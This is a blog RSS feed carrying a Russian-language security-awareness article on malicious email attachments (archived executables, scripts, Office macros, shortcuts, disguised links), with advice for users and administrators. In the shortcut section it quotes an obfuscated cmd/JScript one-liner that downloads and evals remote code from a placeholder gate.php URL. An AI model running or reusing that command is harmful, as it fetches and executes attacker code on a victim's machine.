<?xml version="1.0" encoding="utf-8"?> 
<rss version="2.0"
  xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
  xmlns:atom="http://www.w3.org/2005/Atom">

<channel>

<title>Блог Start X: заметки с тегом скрипты</title>
<link>https://blog.startx.team/tags/skripty/</link>
<description>как поведение людей влияет на безопасность Наши продукты • Дайджесты • Статьи • Список постов</description>
<author>Start X</author>
<language>ru</language>
<generator>E2 (v3820; Aegea)</generator>

<itunes:owner>
<itunes:name>Start X</itunes:name>
<itunes:email></itunes:email>
</itunes:owner>
<itunes:subtitle>как поведение людей влияет на безопасность Наши продукты • Дайджесты • Статьи • Список постов</itunes:subtitle>
<itunes:image href="" />
<itunes:explicit></itunes:explicit>

<item>
<title>Опасные вложения</title>
<guid isPermaLink="false">3</guid>
<link>https://blog.startx.team/all/malware-attached/</link>
<pubDate>Mon, 12 Sep 2016 01:57:03 +0300</pubDate>
<author>Start X</author>
<comments>https://blog.startx.team/all/malware-attached/</comments>
<description>
&lt;p main&gt;
&lt;i&gt;Опытные пользователи знают, что через почту им могут прислать вирус или троянскую программу. Мошенники, в свою очередь, стараются сделать так, чтобы вредоносные вложения выглядели как можно более безобидно.&lt;/i&gt;
&lt;br&gt;&lt;br&gt;
В статье мы покажем примеры опасных вложений и объясним, на что стоит обращать внимание, чтобы не стать жертвой. Статья будет полезна пользователям и системным администраторам. &lt;/p&gt;
&lt;p aside style="opacity: 1; text-align: center;"&gt;
&lt;img src="/pictures/svoldokhin_new.jpg" width="40%"/&gt; &lt;br /&gt;
Сергей Волдохин &lt;br /&gt;
&lt;a href="mailto:sv@antiphish.ru"&gt;sv@antiphish.ru&lt;/a&gt;
&lt;/p&gt;
&lt;h2&gt;«Традиционный» вредоносный файл&lt;/h2&gt;
&lt;p&gt;Вирус или троянскую программу пользователи обычно представляют как исполняемый файл с расширением .ехе под Виндовс или .dmg под Мак.&lt;/p&gt;
&lt;p&gt;Такая вредоносная программа, приложенная к письму, может не определяться антивирусом, но почти все почтовые серверы умеют фильтровать подобные вложения: письмо с .ехе-файлом просто не будет отправлено. Чтобы обойти это ограничение, мошенникам бывает достаточно упаковать исполняемый файл в архив:&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/wurde.JPG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/jack-exe.PNG" /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Что делать пользователю:&lt;/b&gt; получив любое вложение в архиве, распакуйте его в отдельную папку и проверьте тип вложенного файла. Не открывайте файлы типа &lt;i&gt;Приложение&lt;/i&gt;, даже если ваш антивирус не против.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору.&lt;/b&gt; Постарайтесь ограничить прием почты с исполняемыми файлами, даже если они упакованы в архив. При настройке ограничений стоит ориентироваться на &lt;a href="https://en.wikipedia.org/wiki/Portable_Executable"&gt;формат файла&lt;/a&gt;, а не его расширение.&lt;/p&gt;
&lt;h2&gt;Вредоносный скрипт&lt;/h2&gt;
&lt;p&gt;Кроме традиционных программ, операционная система Виндоус умеет выполнять так называемые скрипты — программы, написанные на специальном языке программирования, например JScript или WBScript.&lt;/p&gt;
&lt;p&gt;У таких языков есть ряд ограничений, но написанная на них вредоносная программа вполне способна зашифровать все файлы на диске или скачать полноценного троянца.&lt;/p&gt;
&lt;p&gt;О существовании скриптов знает еще меньше пользователей, а мошенники стараются скрыть настоящий тип файла: например, через длинное или вызывающее доверие название:&lt;br /&gt;
&lt;img src="/pictures/meeting-wsf.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/scan-js.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/sct.PNG" /&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href="https://twitter.com/subtee/status/771356649449586690"&gt;Источник&lt;/a&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; Не открывайте файл, тип которого содержит слова «скрипт», «сценарий» или что-то непонятное. И даже если ваш антивирус не имеет ничего против.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; постарайтесь заблокировать исполнение скриптов, или хотя бы переопределить их обработчики. Файл .js, для которого обработчиком назначен notepad.exe — неплохая помощь антивирусу и защита для невнимательных пользователей.&lt;/p&gt;
&lt;h2&gt;Офисный документ&lt;/h2&gt;
&lt;p&gt;Пользователям бывает сложно поверить, но файлы Ворд или Эксель тоже могут быть вредоносными. Наиболее популярная схема — вредоносная программа запускается через макрос, который пользователю предлагается разрешить к выполнению под разумным предлогом. Например, если содержимое документа некорректно отображается:&lt;/p&gt;
&lt;p&gt;&lt;img src="/pictures/locky-macros-6401.png" /&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href="https://www.anti-malware.ru/news/2016-02-25/18144"&gt;Источник&lt;/a&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; не разрешайте выполнение макросов в документах, которые вам присылают по электронной почте. Особенно если не знаете отправителя и не уверены в содержании макроса.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; по возможности отключите исполнение макросов на компьютерах пользователей. Те, кому это действительно необходимо для работы, дадут вам знать.  Вовремя обновляйте все офисные программы — кроме макросов, вредоносная программа может выполниться через эксплойт к одной из многих &lt;a href="https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-320/Microsoft-Office.html"&gt;публичных RCE-уязвимостей&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Опасный ярлык&lt;/h2&gt;
&lt;p&gt;Иногда во вложении вовсе может не быть вредоносной программы. Вместо нее мошенники присылают ярлык, перейдя по которому пользователь сам загрузит и запустит вредоносную программу:&lt;/p&gt;
&lt;p&gt;&lt;img src="/pictures/schet.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/attached.PNG" width="100%" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/link-properties.PNG" /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;В свойствах этого ярлыка прописана команда, которая загрузит и запустит вредоносный .js-скрипт из интернета. Все, что нужно для загрузки и запуска, уже содержится в операционной системе.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; ярлыки, которым вы можете доверять, находятся на вашем рабочем столе. Не стоит запускать файл с типом &lt;i&gt;Ярлык&lt;/i&gt;, который вам прислали по электронной почте. Даже если его название вызывает доверие.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; постарайтесь заблокировать исполнение любого командного интрпретатора под учетной записью пользователя. По возможности переопределите его имя и путь — вредоносным программам будет сложнее сориентироваться. Обратите внимание на полное содержимое вредоносного ярлыка:&lt;/p&gt;
&lt;pre class="e2-text-code"&gt;&lt;code class=""&gt;%windir%\system32\cmd.exe /c REM.&amp;gt;3.txt&amp;amp;echo var ty= new ActiveXObject(&amp;quot;Msxml2.ServerXMLHTTP.6.0&amp;quot;);ty[&amp;quot;\x6F\x70\x65\x6E&amp;quot;](&amp;quot;\x47\x45\x54&amp;quot;,&amp;quot;http://&amp;lt;url&amp;gt;.com/src/gate.php?a&amp;quot;);ty[&amp;quot;\x73\x65\x6E\x64&amp;quot;]();eval(ty[&amp;quot;responseText&amp;quot;]);&amp;gt;3.txt&amp;amp;ren 3.txt 3.js&amp;amp;3.js&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Вредоносная ссылка&lt;/h2&gt;
&lt;p&gt;Иногда мошенники не рискуют высылать вложенный файл, а вместо этого добавляют в письмо вредоносную ссылку. Благодаря оформлению, такая ссылка выглядит похожей на «безопасный» вложенный файл:&lt;/p&gt;
&lt;p&gt;&lt;img alt="" src="/pictures/zakaz.PNG" style="border: 1px solid gray;" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="" src="/pictures/url.png" /&gt;&lt;/p&gt;
&lt;p&gt;Обе ссылки около «заявки» ведут на вредоносный файл.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; умейте отличать вложенный файл от ссылки, которая ведет на внешний сайт. Наведите курсор и посмотрите, куда на самом деле ведет «ссылка на документ».&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; постарайтесь ограничить загрузку исполняемых файлов на прокси-сервере. Аналогично вложениям, ориентируйтесь на тип файла, а не расширение.&lt;/p&gt;
&lt;h2&gt;Выводы&lt;/h2&gt;
&lt;ol start="1"&gt;
&lt;li&gt;Мошенники используют самые разные форматы вредоносных вложений.&lt;/li&gt;
&lt;li&gt;Не открывайте никакие вложения и не переходите по ссылкам, в которых не уверены.&lt;/li&gt;
&lt;li&gt;По возможности ограничьте запуск скриптов, командных интерпретаторов и загрузку небезопасных типов файлов.&lt;/li&gt;
&lt;li&gt;Обучайте своих пользователей основам информационной безопасности. Для начала можно переслать ссылку на эту статью.&lt;/li&gt;
&lt;li&gt;Тренируйте и контролируйте практические навыки противодействия фишингу.&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="padding: 1em; background-color: cornsilk; width: 80%; margin-bottom: 1em;"&gt;&lt;p&gt;&lt;b&gt;О компании «Антифишинг»&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Мы помогаем обучить сотрудников и контролируем их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и актуальные примеры мошеннических писем — в том числе те, которые описаны в статье.&lt;/p&gt;
&lt;p&gt;Чтобы проверить своих пользователей, отправьте запрос через &lt;a href="http://www.antiphish.ru"&gt;наш сайт&lt;/a&gt; или напишите нам: &lt;a href="mailto:ask@antiphish.ru"&gt;ask@antiphish.ru&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</description>
</item>


</channel>
</rss>